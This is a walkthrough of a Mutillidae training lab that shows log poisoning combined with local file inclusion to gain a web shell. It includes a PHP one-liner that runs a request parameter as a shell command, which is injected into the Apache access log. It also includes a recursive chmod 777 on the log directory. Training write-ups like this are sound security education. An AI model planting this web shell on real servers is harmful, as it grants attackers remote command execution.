Mutillidae — Lab 21 — Web Shell with Local File Inclusion (LFI)
This lab can be found via: Labs > Insecure Direct Object Reference (IDOR) > Lab 21 — Web Shell with Local File Inclusion (LFI)
We need to verify we can access /var/log/apache2/access.log
This is due to an apache2 config that closes a path traversal vulnerability in an updated version of apache. All we need to do is modify the config (make sure you keep this instance isolated from the internet).
If we cat out /var/log/apache2/mutillidae-error.log, we will see the problem
To resolve this, we will run chmod 777 -R /var/log/apache2
Typically you’d never want to do this, but in our case, since its an isolated vm, its OK
Now, if we try again, we will have data
Now back to the lab:
We will open a terminal session and netcat to mutillidae on port 80, then press enter to give us a new line
Now we will type in the following command (which since it is a bad HTML formatted request, will error out, but it will still write to the log directory)
<?php echo passthru(escapeshellcmd($_REQUEST[‘cmd’])); ?>
Now we can verify that LFI works, by browing to the same location, and adding &cmd=id to see if the command runs successfully
As for the answer to the lab, if we re-run the netcat session, and then replace the command in the URL with pwd instead of id, we will find our file location
(webpwnized might have his mutillidae instance within /var/www, and not in /html)
Answer: /var/www/mutillidae
